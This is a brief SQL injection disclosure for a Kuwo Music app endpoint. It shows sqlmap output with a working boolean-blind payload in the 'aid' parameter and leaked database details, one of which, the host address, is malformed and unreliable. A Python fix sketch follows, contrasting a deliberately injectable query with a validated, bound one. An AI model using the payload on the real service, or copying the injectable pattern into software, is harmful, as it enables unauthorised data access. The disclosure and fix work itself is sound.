SQL Injection Vulnerability in the Kuwo Music App

  • 2022-03-14 08:34:00

  *****300&type=guid&_=1478935789&*****

  Injection point: aid

  sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:

  ---

  Parameter: aid (GET)

  Type: boolean-based blind

  Title: AND boolean-based blind - WHERE or HAVING clause

  Payload: aid=2078300) AND 2825=2825 AND (5697=5697&type=guid&_=1478935789pid=5901124&uid=21259663

  ---

  web application technology: JSP

  back-end DBMS: MySQL >= 5.0.2

  current user: 'root@192.168.298.15'

  current database: 'MLOG'

  For verification only; please fix as soon as possible!

  Remediation:

  Filter the parameter.
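
  A sketch of the parameter filtering recommended above, added here as an example and not taken from the report or from the vendor's code: the concatenated query shape that the reported payload suggests, next to a validated and bound form. Python with SQLite stands in for the JSP/MySQL back end, and the table, column and function names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed sample data; the schema is an assumption, not from the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE album (aid INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO album VALUES (2078300, 'sample album')")
    return db


def lookup_vulnerable(db, raw_aid):
    # "Before" form (assumed): the raw parameter is concatenated inside
    # parentheses, so anything after the number is parsed as SQL.
    sql = "SELECT title FROM album WHERE (aid = " + raw_aid + ")"
    return db.execute(sql).fetchall()


def parse_aid(raw_aid):
    # Allow-list filter: ASCII decimal digits only, bounded length.
    if not (raw_aid.isascii() and raw_aid.isdigit() and len(raw_aid) <= 18):
        raise ValueError("aid must be a decimal integer")
    return int(raw_aid)


def lookup_hardened(db, raw_aid):
    # Validate first, then bind the integer; the value never becomes SQL text.
    aid = parse_aid(raw_aid)
    return db.execute(
        "SELECT title FROM album WHERE (aid = ?)", (aid,)
    ).fetchall()


def demo():
    db = make_db()
    # The aid value from the sqlmap output in the report.
    reported = "2078300) AND 2825=2825 AND (5697=5697"
    rows_vulnerable = lookup_vulnerable(db, reported)  # appended SQL executes
    try:
        lookup_hardened(db, reported)
        rejected = False
    except ValueError:
        rejected = True
    return rows_vulnerable, rejected, lookup_hardened(db, "2078300")


if __name__ == "__main__":
    print(demo())
```

  The same two steps carry over to a JSP back end: parse the parameter as an integer and pass it through a bound placeholder in a prepared statement.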
